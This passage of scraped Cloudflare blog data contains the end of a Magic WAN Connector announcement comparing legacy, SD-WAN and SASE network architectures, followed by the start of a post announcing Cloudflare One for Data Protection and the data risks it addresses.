style=\"font-size:9pt;font-family:Inter,sans-serif;color:#172b4d;background-color:transparent;font-weight:600;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre;white-space:pre-wrap;\">Last mile&nbsp;</span></p><p dir=\"ltr\" style=\"line-height:1.38;margin-left: 0pt;margin-right: 0pt;text-align: center;margin-top:0pt;margin-bottom:0pt;\"><span style=\"font-size:9pt;font-family:Inter,sans-serif;color:#172b4d;background-color:transparent;font-weight:600;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre;white-space:pre-wrap;\">traffic control</span></p></td><td style=\"border-left:solid #c1c7d0 1pt;border-right:solid #c1c7d0 1pt;border-bottom:solid #a9afa9 1pt;border-top:solid #a9afa9 1pt;vertical-align:middle;padding:0pt 7pt 0pt 7pt;overflow:hidden;overflow-wrap:break-word;\"><p dir=\"ltr\" style=\"line-height:1.38;margin-left: 0pt;margin-right: 0pt;text-align: center;margin-top:0pt;margin-bottom:0pt;\"><span style=\"font-size:9pt;font-family:Inter,sans-serif;color:#172b4d;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre;white-space:pre-wrap;\">Traffic balancing, QoS, and failover</span></p></td><td style=\"border-left:solid #c1c7d0 1pt;border-right:solid #c1c7d0 1pt;border-bottom:solid #a9afa9 1pt;border-top:solid #a9afa9 1pt;vertical-align:middle;background-color:#e3fcef;padding:0pt 7pt 0pt 7pt;overflow:hidden;overflow-wrap:break-word;\"><p dir=\"ltr\" style=\"line-height:1.38;margin-left: 0pt;margin-right: 0pt;text-align: center;margin-top:0pt;margin-bottom:0pt;\"><span style=\"font-size:9pt;font-family:Inter,sans-serif;color:#172b4d;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre;white-space:pre-wrap;\">Covered by MPLS SLAs</span></p></td><td style=\"border-left:solid #c1c7d0 1pt;border-right:solid #c1c7d0 1pt;border-bottom:solid #a9afa9 1pt;border-top:solid #a9afa9 1pt;vertical-align:middle;background-color:#e3fcef;padding:0pt 7pt 0pt 7pt;overflow:hidden;overflow-wrap:break-word;\"><p dir=\"ltr\" style=\"line-height:1.38;margin-left: 0pt;margin-right: 0pt;text-align: center;margin-top:0pt;margin-bottom:0pt;\"><span style=\"font-size:9pt;font-family:Inter,sans-serif;color:#172b4d;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre;white-space:pre-wrap;\">Best Path selection available </span><span style=\"font-size:9pt;font-family:Inter,sans-serif;color:#172b4d;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre;white-space:pre-wrap;\"><br></span><span style=\"font-size:9pt;font-family:Inter,sans-serif;color:#172b4d;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre;white-space:pre-wrap;\">in SD-WAN appliance&nbsp;</span></p></td><td style=\"border-left:solid #c1c7d0 1pt;border-right:solid #c1c7d0 1pt;border-bottom:solid #a9afa9 1pt;border-top:solid #a9afa9 1pt;vertical-align:middle;background-color:#e3fcef;padding:7pt 7pt 7pt 7pt;overflow:hidden;overflow-wrap:break-word;\"><p dir=\"ltr\" style=\"line-height:1.38;margin-left: 0pt;margin-right: 0pt;text-align: center;margin-top:0pt;margin-bottom:0pt;\"><span style=\"font-size:9pt;font-family:Inter,sans-serif;color:#172b4d;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre;white-space:pre-wrap;\">Minimal on-prem deployment to control local decision making</span></p></td></tr><tr style=\"height:57pt\"><td style=\"border-left:solid #c1c7d0 1pt;border-right:solid #c1c7d0 1pt;border-bottom:solid #a9afa9 1pt;border-top:solid #a9afa9 1pt;vertical-align:middle;background-color:#e2f5fa;padding:0pt 7pt 0pt 7pt;overflow:hidden;overflow-wrap:break-word;\"><p dir=\"ltr\" style=\"line-height:1.38;margin-left: 0pt;margin-right: 0pt;text-align: center;margin-top:0pt;margin-bottom:0pt;\"><span style=\"font-size:9pt;font-family:Inter,sans-serif;color:#172b4d;background-color:transparent;font-weight:600;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre;white-space:pre-wrap;\">Middle mile&nbsp;</span></p><p dir=\"ltr\" style=\"line-height:1.38;margin-left: 0pt;margin-right: 0pt;text-align: center;margin-top:0pt;margin-bottom:0pt;\"><span style=\"font-size:9pt;font-family:Inter,sans-serif;color:#172b4d;background-color:transparent;font-weight:600;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre;white-space:pre-wrap;\">traffic control</span></p></td><td style=\"border-left:solid #c1c7d0 1pt;border-right:solid #c1c7d0 1pt;border-bottom:solid #a9afa9 1pt;border-top:solid #a9afa9 1pt;vertical-align:middle;padding:0pt 7pt 0pt 7pt;overflow:hidden;overflow-wrap:break-word;\"><p dir=\"ltr\" style=\"line-height:1.38;margin-left: 0pt;margin-right: 0pt;text-align: center;margin-top:0pt;margin-bottom:0pt;\"><span style=\"font-size:9pt;font-family:Inter,sans-serif;color:#172b4d;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre;white-space:pre-wrap;\">Traffic steering around middle mile congestion</span></p></td><td style=\"border-left:solid #c1c7d0 1pt;border-right:solid #c1c7d0 1pt;border-bottom:solid #a9afa9 1pt;border-top:solid #a9afa9 1pt;vertical-align:middle;background-color:#e3fcef;padding:0pt 7pt 0pt 7pt;overflow:hidden;overflow-wrap:break-word;\"><p dir=\"ltr\" style=\"line-height:1.38;margin-left: 0pt;margin-right: 0pt;text-align: center;margin-top:0pt;margin-bottom:0pt;\"><span style=\"font-size:9pt;font-family:Inter,sans-serif;color:#172b4d;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre;white-space:pre-wrap;\">Covered by MPLS SLAs</span></p></td><td style=\"border-left:solid #c1c7d0 1pt;border-right:solid #c1c7d0 1pt;border-bottom:solid #a9afa9 1pt;border-top:solid #a9afa9 1pt;vertical-align:middle;background-color:#f4cccc;padding:0pt 7pt 0pt 7pt;overflow:hidden;overflow-wrap:break-word;\"><p dir=\"ltr\" style=\"line-height:1.38;margin-left: 0pt;margin-right: 0pt;text-align: center;margin-top:0pt;margin-bottom:0pt;\"><span style=\"font-size:9pt;font-family:Inter,sans-serif;color:#172b4d;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre;white-space:pre-wrap;\">“Tunnel Spaghetti” and still no control over the middle mile</span></p></td><td style=\"border-left:solid #c1c7d0 1pt;border-right:solid #c1c7d0 1pt;border-bottom:solid #a9afa9 1pt;border-top:solid #a9afa9 1pt;vertical-align:middle;background-color:#e3fcef;padding:7pt 7pt 7pt 7pt;overflow:hidden;overflow-wrap:break-word;\"><p dir=\"ltr\" style=\"line-height:1.38;margin-left: 0pt;margin-right: 0pt;text-align: center;margin-top:0pt;margin-bottom:0pt;\"><span style=\"font-size:9pt;font-family:Inter,sans-serif;color:#172b4d;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre;white-space:pre-wrap;\">Integrated traffic management &amp; private backbone controls in a unified dashboard</span></p></td></tr><tr style=\"height:43pt\"><td style=\"border-left:solid #c1c7d0 1pt;border-right:solid #c1c7d0 1pt;border-bottom:solid #a9afa9 1pt;border-top:solid #a9afa9 1pt;vertical-align:middle;background-color:#e2f5fa;padding:0pt 7pt 0pt 7pt;overflow:hidden;overflow-wrap:break-word;\"><p dir=\"ltr\" style=\"line-height:1.38;margin-left: 0pt;margin-right: 0pt;text-align: center;margin-top:0pt;margin-bottom:0pt;\"><span style=\"font-size:9pt;font-family:Inter,sans-serif;color:#172b4d;background-color:transparent;font-weight:600;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre;white-space:pre-wrap;\">Cloud integration</span></p></td><td style=\"border-left:solid #c1c7d0 1pt;border-right:solid #c1c7d0 1pt;border-bottom:solid #a9afa9 1pt;border-top:solid #a9afa9 1pt;vertical-align:middle;padding:0pt 7pt 0pt 7pt;overflow:hidden;overflow-wrap:break-word;\"><p dir=\"ltr\" style=\"line-height:1.38;margin-left: 0pt;margin-right: 0pt;text-align: center;margin-top:0pt;margin-bottom:0pt;\"><span style=\"font-size:9pt;font-family:Inter,sans-serif;color:#172b4d;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre;white-space:pre-wrap;\">Connectivity for cloud migration</span></p></td><td style=\"border-left:solid #c1c7d0 1pt;border-right:solid #c1c7d0 1pt;border-bottom:solid #a9afa9 1pt;border-top:solid #a9afa9 1pt;vertical-align:middle;background-color:#fff2cc;padding:0pt 7pt 0pt 7pt;overflow:hidden;overflow-wrap:break-word;\"><p dir=\"ltr\" style=\"line-height:1.38;margin-left: 0pt;margin-right: 0pt;text-align: center;margin-top:0pt;margin-bottom:0pt;\"><span style=\"font-size:9pt;font-family:Inter,sans-serif;color:#172b4d;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre;white-space:pre-wrap;\">Centralized breakout</span></p></td><td style=\"border-left:solid #c1c7d0 1pt;border-right:solid #c1c7d0 1pt;border-bottom:solid #a9afa9 1pt;border-top:solid #a9afa9 1pt;vertical-align:middle;background-color:#fff2cc;padding:0pt 7pt 0pt 7pt;overflow:hidden;overflow-wrap:break-word;\"><p dir=\"ltr\" style=\"line-height:1.38;margin-left: 0pt;margin-right: 0pt;text-align: center;margin-top:0pt;margin-bottom:0pt;\"><span style=\"font-size:9pt;font-family:Inter,sans-serif;color:#172b4d;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre;white-space:pre-wrap;\">Decentralized breakout</span></p></td><td style=\"border-left:solid #c1c7d0 1pt;border-right:solid #c1c7d0 1pt;border-bottom:solid #a9afa9 1pt;border-top:solid #a9afa9 1pt;vertical-align:middle;background-color:#e3fcef;padding:7pt 7pt 7pt 7pt;overflow:hidden;overflow-wrap:break-word;\"><p dir=\"ltr\" style=\"line-height:1.38;margin-left: 0pt;margin-right: 0pt;text-align: center;margin-top:0pt;margin-bottom:0pt;\"><span style=\"font-size:9pt;font-family:Inter,sans-serif;color:#172b4d;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre;white-space:pre-wrap;\">Native connectivity with Cloud Network Interconnect</span></p></td></tr><tr style=\"height:43pt\"><td style=\"border-left:solid #c1c7d0 1pt;border-right:solid #c1c7d0 1pt;border-bottom:solid #a9afa9 1pt;border-top:solid #a9afa9 1pt;vertical-align:middle;background-color:#e2f5fa;padding:0pt 7pt 0pt 7pt;overflow:hidden;overflow-wrap:break-word;\"><p dir=\"ltr\" style=\"line-height:1.38;margin-left: 0pt;margin-right: 0pt;text-align: center;margin-top:0pt;margin-bottom:0pt;\"><span style=\"font-size:9pt;font-family:Inter,sans-serif;color:#172b4d;background-color:transparent;font-weight:600;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre;white-space:pre-wrap;\">Security</span></p></td><td style=\"border-left:solid #c1c7d0 1pt;border-right:solid #c1c7d0 1pt;border-bottom:solid #a9afa9 1pt;border-top:solid #a9afa9 1pt;vertical-align:middle;padding:0pt 7pt 0pt 7pt;overflow:hidden;overflow-wrap:break-word;\"><p dir=\"ltr\" style=\"line-height:1.38;margin-left: 0pt;margin-right: 0pt;text-align: center;margin-top:0pt;margin-bottom:0pt;\"><span style=\"font-size:9pt;font-family:Inter,sans-serif;color:#172b4d;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre;white-space:pre-wrap;\">Filter in &amp; outbound Internet traffic for malware</span></p></td><td style=\"border-left:solid #c1c7d0 1pt;border-right:solid #c1c7d0 1pt;border-bottom:solid #a9afa9 1pt;border-top:solid #a9afa9 1pt;vertical-align:middle;background-color:#fff2cc;padding:0pt 7pt 0pt 7pt;overflow:hidden;overflow-wrap:break-word;\"><p dir=\"ltr\" style=\"line-height:1.38;margin-left: 0pt;margin-right: 0pt;text-align: center;margin-top:0pt;margin-bottom:0pt;\"><span style=\"font-size:9pt;font-family:Inter,sans-serif;color:#172b4d;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre;white-space:pre-wrap;\">Patchwork of hardware controls</span></p></td><td style=\"border-left:solid #c1c7d0 1pt;border-right:solid #c1c7d0 1pt;border-bottom:solid #a9afa9 1pt;border-top:solid #a9afa9 1pt;vertical-align:middle;background-color:#fff2cc;padding:0pt 7pt 0pt 7pt;overflow:hidden;overflow-wrap:break-word;\"><p dir=\"ltr\" style=\"line-height:1.38;margin-left: 0pt;margin-right: 0pt;text-align: center;margin-top:0pt;margin-bottom:0pt;\"><span style=\"font-size:9pt;font-family:Inter,sans-serif;color:#172b4d;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre;white-space:pre-wrap;\">Patchwork of hardware </span><span style=\"font-size:9pt;font-family:Inter,sans-serif;color:#172b4d;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre;white-space:pre-wrap;\"><br></span><span style=\"font-size:9pt;font-family:Inter,sans-serif;color:#172b4d;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre;white-space:pre-wrap;\">and/or software controls</span></p></td><td style=\"border-left:solid #c1c7d0 1pt;border-right:solid #c1c7d0 1pt;border-bottom:solid #a9afa9 1pt;border-top:solid #a9afa9 1pt;vertical-align:middle;background-color:#e3fcef;padding:7pt 7pt 7pt 7pt;overflow:hidden;overflow-wrap:break-word;\"><p dir=\"ltr\" style=\"line-height:1.38;margin-left: 0pt;margin-right: 0pt;text-align: center;margin-top:0pt;margin-bottom:0pt;\"><span style=\"font-size:9pt;font-family:Inter,sans-serif;color:#172b4d;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre;white-space:pre-wrap;\">Native integration with user, data, application &amp; network security tools</span></p></td></tr><tr style=\"height:43pt\"><td style=\"border-left:solid #c1c7d0 1pt;border-right:solid #c1c7d0 1pt;border-bottom:solid #a9afa9 1pt;border-top:solid #a9afa9 1pt;vertical-align:middle;background-color:#e2f5fa;padding:0pt 7pt 0pt 7pt;overflow:hidden;overflow-wrap:break-word;\"><p dir=\"ltr\" style=\"line-height:1.38;margin-left: 0pt;margin-right: 0pt;text-align: center;margin-top:0pt;margin-bottom:0pt;\"><span style=\"font-size:9pt;font-family:Inter,sans-serif;color:#172b4d;background-color:transparent;font-weight:600;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre;white-space:pre-wrap;\">Cost</span></p></td><td style=\"border-left:solid #c1c7d0 1pt;border-right:solid #c1c7d0 1pt;border-bottom:solid #a9afa9 1pt;border-top:solid #a9afa9 1pt;vertical-align:middle;padding:0pt 7pt 0pt 7pt;overflow:hidden;overflow-wrap:break-word;\"><p dir=\"ltr\" style=\"line-height:1.38;margin-left: 0pt;margin-right: 0pt;text-align: center;margin-top:0pt;margin-bottom:0pt;\"><span style=\"font-size:9pt;font-family:Inter,sans-serif;color:#172b4d;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre;white-space:pre-wrap;\">Maximize ROI for network investments</span></p></td><td style=\"border-left:solid #c1c7d0 1pt;border-right:solid #c1c7d0 1pt;border-bottom:solid #a9afa9 1pt;border-top:solid #a9afa9 1pt;vertical-align:middle;background-color:#fff2cc;padding:0pt 7pt 0pt 7pt;overflow:hidden;overflow-wrap:break-word;\"><p dir=\"ltr\" style=\"line-height:1.38;margin-left: 0pt;margin-right: 0pt;text-align: center;margin-top:0pt;margin-bottom:0pt;\"><span style=\"font-size:9pt;font-family:Inter,sans-serif;color:#172b4d;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre;white-space:pre-wrap;\">High cost for hardware and connectivity</span></p></td><td style=\"border-left:solid #c1c7d0 1pt;border-right:solid #c1c7d0 1pt;border-bottom:solid #a9afa9 1pt;border-top:solid #a9afa9 1pt;vertical-align:middle;background-color:#f4cccc;padding:0pt 7pt 0pt 7pt;overflow:hidden;overflow-wrap:break-word;\"><p dir=\"ltr\" style=\"line-height:1.38;margin-left: 0pt;margin-right: 0pt;text-align: center;margin-top:0pt;margin-bottom:0pt;\"><span style=\"font-size:9pt;font-family:Inter,sans-serif;color:#172b4d;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre;white-space:pre-wrap;\">Optimized connectivity costs at the expense of increased&nbsp;</span></p><p dir=\"ltr\" style=\"line-height:1.38;margin-left: 0pt;margin-right: 0pt;text-align: center;margin-top:0pt;margin-bottom:0pt;\"><span style=\"font-size:9pt;font-family:Inter,sans-serif;color:#172b4d;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre;white-space:pre-wrap;\">hardware and software costs</span></p></td><td style=\"border-left:solid #c1c7d0 1pt;border-right:solid #c1c7d0 1pt;border-bottom:solid #a9afa9 1pt;border-top:solid #a9afa9 1pt;vertical-align:middle;background-color:#e3fcef;padding:7pt 7pt 7pt 7pt;overflow:hidden;overflow-wrap:break-word;\"><p dir=\"ltr\" style=\"line-height:1.38;margin-left: 0pt;margin-right: 0pt;text-align: center;margin-top:0pt;margin-bottom:0pt;\"><span style=\"font-size:9pt;font-family:Inter,sans-serif;color:#172b4d;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre;white-space:pre-wrap;\">Decreased hardware and connectivity costs for maximized ROI</span></p></td></tr></tbody></table><!--kg-card-end: html--><p><i>Summary of legacy, SD-WAN based, and SASE architecture considerations</i></p><p>Love and want to keep your current SD-WAN vendor? No problem - you can still use any appliance that supports IPsec or GRE as an on-ramp for Cloudflare One.</p>\n <div class=\"flex anchor relative\">\n <h3 id=\"ready-to-simplify-your-sase-journey\">Ready to simplify your SASE journey?</h3>\n <a href=\"#ready-to-simplify-your-sase-journey\" aria-hidden=\"true\" class=\"relative sm:absolute sm:-left-5\">\n <svg width=\"16\" height=\"16\" viewBox=\"0 0 24 24\"><path fill=\"currentcolor\" d=\"m12.11 15.39-3.88 3.88a2.52 2.52 0 0 1-3.5 0 2.47 2.47 0 0 1 0-3.5l3.88-3.88a1 1 0 0 0-1.42-1.42l-3.88 3.89a4.48 4.48 0 0 0 6.33 6.33l3.89-3.88a1 1 0 1 0-1.42-1.42Zm8.58-12.08a4.49 4.49 0 0 0-6.33 0l-3.89 3.88a1 1 0 0 0 1.42 1.42l3.88-3.88a2.52 2.52 0 0 1 3.5 0 2.47 2.47 0 0 1 0 3.5l-3.88 3.88a1 1 0 1 0 1.42 1.42l3.88-3.89a4.49 4.49 0 0 0 0-6.33ZM8.83 15.17a1 1 0 0 0 1.1.22 1 1 0 0 0 .32-.22l4.92-4.92a1 1 0 0 0-1.42-1.42l-4.92 4.92a1 1 0 0 0 0 1.42Z\"></path></svg>\n </a>\n </div>\n <p>You can learn more about the Magic WAN Connector, including device specs, specific feature info, onboarding process details, and more at our <a href=\"https://developers.cloudflare.com/magic-wan/connector/\">dev docs</a>, or <a href=\"https://www.cloudflare.com/products/zero-trust/plans/enterprise/\">contact us</a> to get started today.</p>"],"published_at":[0,"2023-10-03T13:55:34.000+01:00"],"updated_at":[0,"2024-11-22T17:40:08.915Z"],"feature_image":[0,"https://cf-assets.www.cloudflare.com/zkvhlag99gkb/69EmEc30BYiVjb4sQVT4oX/f8e12b47ef7735774a4c299b347c6a22/magic-wan-connector-general-availability.png"],"tags":[1,[[0,{"id":[0,"6QktrXeEFcl4e2dZUTZVGl"],"name":[0,"Product News"],"slug":[0,"product-news"]}],[0,{"id":[0,"6Mp7ouACN2rT3YjL1xaXJx"],"name":[0,"Security"],"slug":[0,"security"]}],[0,{"id":[0,"7r0zxUQ3XCgTw2blCdlw55"],"name":[0,"Magic WAN"],"slug":[0,"magic-wan"]}],[0,{"id":[0,"4yp4kTLKcP1odooi6ADoJY"],"name":[0,"Magic WAN Connector"],"slug":[0,"magic-wan-connector"]}],[0,{"id":[0,"2UI24t7uddD0CIIUJCu1f4"],"name":[0,"SASE"],"slug":[0,"sase"]}],[0,{"id":[0,"J61Eszqn98amrYHq4IhTx"],"name":[0,"Zero Trust"],"slug":[0,"zero-trust"]}],[0,{"id":[0,"5OywGP63AdM9Umyvaku8OP"],"name":[0,"Connectivity Cloud"],"slug":[0,"connectivity-cloud"]}]]],"relatedTags":[0],"authors":[1,[[0,{"name":[0,"Annika Garbers"],"slug":[0,"annika"],"bio":[0,null],"profile_image":[0,"https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6SY53ZloWPZ3xlkvdwhfNZ/ac5d40ee46780432e16dd7fc74c1e698/annika.png"],"location":[0,null],"website":[0,null],"twitter":[0,"@annikagarbers"],"facebook":[0,null]}]]],"meta_description":[0,"We’re announcing the general availability of the Magic WAN Connector, which serves as the glue between your existing network hardware and Cloudflare’s networ"],"primary_author":[0,{}],"localeList":[0,{"name":[0,"Announcing General Availability for the Magic WAN Connector: the easiest way to jumpstart SASE transformation for your network Config"],"enUS":[0,"English for Locale"],"zhCN":[0,"Translated for Locale"],"zhHansCN":[0,"No Page for Locale"],"zhTW":[0,"Translated for Locale"],"frFR":[0,"No Page for Locale"],"deDE":[0,"No Page for Locale"],"itIT":[0,"No Page for Locale"],"jaJP":[0,"Translated for Locale"],"koKR":[0,"Translated for Locale"],"ptBR":[0,"No Page for Locale"],"esLA":[0,"No Page for Locale"],"esES":[0,"No Page for Locale"],"enAU":[0,"No Page for Locale"],"enCA":[0,"No Page for Locale"],"enIN":[0,"No Page for Locale"],"enGB":[0,"No Page for Locale"],"idID":[0,"No Page for Locale"],"ruRU":[0,"No Page for Locale"],"svSE":[0,"No Page for Locale"],"viVN":[0,"No Page for Locale"],"plPL":[0,"No Page for Locale"],"arAR":[0,"No Page for Locale"],"nlNL":[0,"No Page for Locale"],"thTH":[0,"No Page for Locale"],"trTR":[0,"No Page for Locale"],"heIL":[0,"No Page for Locale"],"lvLV":[0,"No Page for Locale"],"etEE":[0,"No Page for Locale"],"ltLT":[0,"No Page for Locale"]}],"url":[0,"https://blog.cloudflare.com/magic-wan-connector-general-availability"],"metadata":[0,{"title":[0,"Announcing General Availability for the Magic WAN Connector: the easiest way to jumpstart SASE transformation for your network"],"description":[0,"We’re announcing the general availability of the Magic WAN Connector, which serves as the glue between your existing network hardware and Cloudflare’s networ"],"imgPreview":[0,"https://cf-assets.www.cloudflare.com/zkvhlag99gkb/26MS3QDTmXoYHjwy9PmimO/0d4235864e1e64076e447a4c898b390f/magic-wan-connector-general-availability-YKM1ry.png"]}]}],[0,{"id":[0,"QhwALHkPakTUyrr9vQo8k"],"title":[0,"Cloudflare One for Data Protection"],"slug":[0,"cloudflare-one-data-protection-announcement"],"excerpt":[0,"This blog announces Cloudflare One for Data Protection — our unified suite to protect data everywhere across web, SaaS, and private applications. Built on and delivered across our entire global network, Cloudflare One’s data protection suite is architected for the risks of modern coding and AI"],"featured":[0,false],"html":[0,"<p></p>\n <figure class=\"kg-card kg-image-card \">\n \n <Image src=\"https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3pZeIACtw7wzkE1aQt7Wbt/8fde767c6c2199f080c529c748b7fbc7/image3.png\" alt=\"Cloudflare One for Data Protection\" class=\"kg-image\" width=\"1200\" height=\"675\" loading=\"lazy\"/>\n \n </figure><p>Data continues to explode in volume, variety, and velocity, and security teams at organizations of all sizes are challenged to keep up. Businesses face escalating risks posed by varied SaaS environments, the emergence of generative <a href=\"https://www.cloudflare.com/learning/ai/what-is-artificial-intelligence/\">artificial intelligence (AI)</a> tools, and the exposure and theft of valuable source code continues to keep <a href=\"https://www.cloudflare.com/ciso/\">CISOs</a> and Data Officers up at night. </p><p>Over the past few years, Cloudflare has launched capabilities to help organizations navigate these risks and gain visibility and controls over their data — including the launches of our <a href=\"/inline-dlp-ga/\">data loss prevention (DLP)</a> and <a href=\"/casb-ga/\">cloud access security broker (CASB)</a> services in the fall of 2022.</p>\n <div class=\"flex anchor relative\">\n <h2 id=\"announcing-cloudflare-ones-data-protection-suite\">Announcing Cloudflare One’s data protection suite</h2>\n <a href=\"#announcing-cloudflare-ones-data-protection-suite\" aria-hidden=\"true\" class=\"relative sm:absolute sm:-left-5\">\n <svg width=\"16\" height=\"16\" viewBox=\"0 0 24 24\"><path fill=\"currentcolor\" d=\"m12.11 15.39-3.88 3.88a2.52 2.52 0 0 1-3.5 0 2.47 2.47 0 0 1 0-3.5l3.88-3.88a1 1 0 0 0-1.42-1.42l-3.88 3.89a4.48 4.48 0 0 0 6.33 6.33l3.89-3.88a1 1 0 1 0-1.42-1.42Zm8.58-12.08a4.49 4.49 0 0 0-6.33 0l-3.89 3.88a1 1 0 0 0 1.42 1.42l3.88-3.88a2.52 2.52 0 0 1 3.5 0 2.47 2.47 0 0 1 0 3.5l-3.88 3.88a1 1 0 1 0 1.42 1.42l3.88-3.89a4.49 4.49 0 0 0 0-6.33ZM8.83 15.17a1 1 0 0 0 1.1.22 1 1 0 0 0 .32-.22l4.92-4.92a1 1 0 0 0-1.42-1.42l-4.92 4.92a1 1 0 0 0 0 1.42Z\"></path></svg>\n </a>\n </div>\n <p>Today, we are building on that momentum and announcing <a href=\"https://www.cloudflare.com/zero-trust/solutions/data-protection\">Cloudflare One for Data Protection</a> — our unified suite to <a href=\"https://www.cloudflare.com/learning/security/what-is-information-security/\">protect data</a> everywhere across web, SaaS, and private applications. Built on and delivered across our entire global network, Cloudflare One’s data protection suite is architected for the risks of modern coding and increased usage of AI.</p><p>Specifically, this suite converges capabilities across Cloudflare’s <a href=\"https://www.cloudflare.com/learning/access-management/what-is-dlp/\">DLP</a>, <a href=\"https://www.cloudflare.com/learning/access-management/what-is-a-casb/\">CASB</a>, <a href=\"https://www.cloudflare.com/learning/access-management/what-is-ztna/\">Zero Trust network access (ZTNA)</a>, <a href=\"https://www.cloudflare.com/learning/access-management/what-is-a-secure-web-gateway/\">secure web gateway (SWG)</a>, <a href=\"https://www.cloudflare.com/learning/access-management/what-is-browser-isolation/\">remote browser isolation (RBI)</a>, and <a href=\"https://www.cloudflare.com/learning/email-security/what-is-email-security/\">cloud email security</a> services onto a single platform for simpler management. All these services are available and packaged now as part of <a href=\"https://www.cloudflare.com/cloudflare-one/\">Cloudflare One</a>, our <a href=\"https://www.cloudflare.com/learning/access-management/what-is-sase/\">SASE</a> platform that converges security and network connectivity services.</p><p>A <a href=\"http://cfl.re/data-protection-roadmap-preview-blog\">separate blog post published today</a> looks back on <i>what</i> technologies and features we delivered over the past year and previews new functionality that customers can look forward to.</p><p>In this blog, we focus more on <i>what impact</i> those technologies and features have for customers in addressing modern data risks — with examples of practical use cases. We believe that Cloudflare One is uniquely positioned to deliver better data protection that addresses modern data risks. And by “better,” we mean:</p><ul><li><p>Helping security teams be <b>more effective</b> protecting data by simplifying inline and API connectivity together with policy management</p></li><li><p>Helping employees be <b>more productive</b> by ensuring fast, reliable, and consistent user experiences</p></li><li><p>Helping organizations be <b>more agile</b> by innovating rapidly to meet evolving data security and privacy requirements</p></li></ul>\n <div class=\"flex anchor relative\">\n <h2 id=\"harder-than-ever-to-secure-data\">Harder than ever to secure data</h2>\n <a href=\"#harder-than-ever-to-secure-data\" aria-hidden=\"true\" class=\"relative sm:absolute sm:-left-5\">\n <svg width=\"16\" height=\"16\" viewBox=\"0 0 24 24\"><path fill=\"currentcolor\" d=\"m12.11 15.39-3.88 3.88a2.52 2.52 0 0 1-3.5 0 2.47 2.47 0 0 1 0-3.5l3.88-3.88a1 1 0 0 0-1.42-1.42l-3.88 3.89a4.48 4.48 0 0 0 6.33 6.33l3.89-3.88a1 1 0 1 0-1.42-1.42Zm8.58-12.08a4.49 4.49 0 0 0-6.33 0l-3.89 3.88a1 1 0 0 0 1.42 1.42l3.88-3.88a2.52 2.52 0 0 1 3.5 0 2.47 2.47 0 0 1 0 3.5l-3.88 3.88a1 1 0 1 0 1.42 1.42l3.88-3.89a4.49 4.49 0 0 0 0-6.33ZM8.83 15.17a1 1 0 0 0 1.1.22 1 1 0 0 0 .32-.22l4.92-4.92a1 1 0 0 0-1.42-1.42l-4.92 4.92a1 1 0 0 0 0 1.42Z\"></path></svg>\n </a>\n </div>\n <p>Data spans more environments than most organizations can keep track of. In conversations with customers, three distinctly modern risks stick out:</p><ol><li><p><b>The growing diversity of cloud and SaaS environments:</b> The apps where knowledge workers spend most of their time — like cloud email inboxes, shared cloud storage folders and documents, SaaS productivity and collaboration suites like Microsoft 365 — are increasingly targeted by threat actors for <a href=\"https://www.cloudflare.com/learning/security/what-is-data-exfiltration/\">data exfiltration</a>.</p></li><li><p><b>Emerging AI tools:</b> Business leaders are concerned about users oversharing sensitive information with opaque <a href=\"https://www.cloudflare.com/learning/ai/what-is-large-language-model/\">large language model tools</a> like ChatGPT, but at the same time, want to leverage the benefits of AI.</p></li><li><p><b>Source code exposure or theft</b>: Developer code fuels digital business, but that same high-value source code can be exposed or targeted for theft across many developer tools like GitHub, including in plain sight locations like public repositories.</p></li></ol><p>These latter two risks, in 